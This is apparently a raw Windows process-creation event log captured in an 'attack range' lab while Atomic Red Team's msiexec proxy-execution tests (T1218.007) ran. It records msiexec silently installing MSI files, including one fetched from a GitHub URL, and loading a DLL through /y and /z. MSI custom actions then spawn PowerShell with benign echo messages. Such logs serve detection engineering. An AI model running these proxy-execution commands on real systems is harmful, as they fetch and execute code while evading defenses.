4688201331200x80200000000000002860044Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x2188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x21a0"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002860043Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x21a0C:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding DDA06EC991B5987424E99FC46B89AD08WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002860018Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1eecC:\Windows\System32\msiexec.exe%%19360x990c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002860004Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x990C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859994Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x16cC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360xbb4powershell.exe -nop -Command Write-Host DllUnregisterServer export executed me; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859993Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xbb4C:\Windows\System32\msiexec.exe%%19360x1e40c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859991Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1e40C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859969Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xd58C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360xc30powershell.exe -nop -Command Write-Host DllRegisterServer export executed me; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859968Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xc30C:\Windows\System32\msiexec.exe%%19360xdc4c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859966Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xdc4C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\src\MSIRunner.dll""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859955Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x108cC:\Windows\Installer\MSIA3FE.tmp%%19360x1e0c"C:\Windows\Installer\MSIA3FE.tmp" "Hello, Atomic Red Team from an EXE!"WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859905Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1ebcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x1890powershell.exe -nop -Command Write-Host CustomAction export executed me; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859904Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x1890C:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding E54BEB320B47C6838ECB4F1DB9F83785WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859852Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x1f2c"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host VBScript executed me!; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859844Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x1f2cC:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding 2AD067C9E131B2AF9A6417ACB2449BE4WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859794Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1134C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x1638"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859786Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x1638C:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding 98C474AE442C0671F7E968E03C12FD26WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859748Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x16c4C:\Windows\Installer\MSI9A67.tmp%%19360x1e0c"C:\Windows\Installer\MSI9A67.tmp" "Hello, Atomic Red Team from an EXE!"WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859740Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1868C:\Windows\System32\msiexec.exe%%19360x1f28c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859738Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1f28C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859715Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x20bcC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360xdb8powershell.exe -nop -Command Write-Host CustomAction export executed me; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859714Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70xdb8C:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding 3E52C00BFB79E391BF757B07D0C15B52WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859707Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xdecC:\Windows\System32\msiexec.exe%%19360x404c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859705Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x404C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_DLL.msi""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859680Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1de4C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x678"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host VBScript executed me!; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859677Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x678C:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding E3756531A1E4656C4E3F75132D78BD65WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859672Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x10dcC:\Windows\System32\msiexec.exe%%19360x1ea4c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859670Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1ea4C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_VBScript.msi""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859645Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x1f08C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe%%19360x170c"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitNULL SID--0x0C:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859644Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x170cC:\Windows\System32\msiexec.exe%%19360x1e0cC:\Windows\System32\MsiExec.exe -Embedding D59DF68029CA2D30E383CCC2E2285117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0cC:\Windows\System32\msiexec.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859638Securitywin-host-mhaag-attack-range-117NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-$WORKGROUP0x3e70x1e0cC:\Windows\System32\msiexec.exe%%19360x274C:\Windows\system32\msiexec.exe /VNULL SID--0x0C:\Windows\System32\services.exeMandatory Label\System Mandatory Level 4688201331200x80200000000000002859633Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0x488C:\Windows\System32\msiexec.exe%%19360xff8c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi"NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\High Mandatory Level 4688201331200x80200000000000002859631Securitywin-host-mhaag-attack-range-117WIN-HOST-MHAAG-\AdministratorAdministratorWIN-HOST-MHAAG-0xe7a0c0xff8C:\Windows\System32\cmd.exe%%19360x7c0"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""NULL SID--0x0C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMandatory Label\High Mandatory Level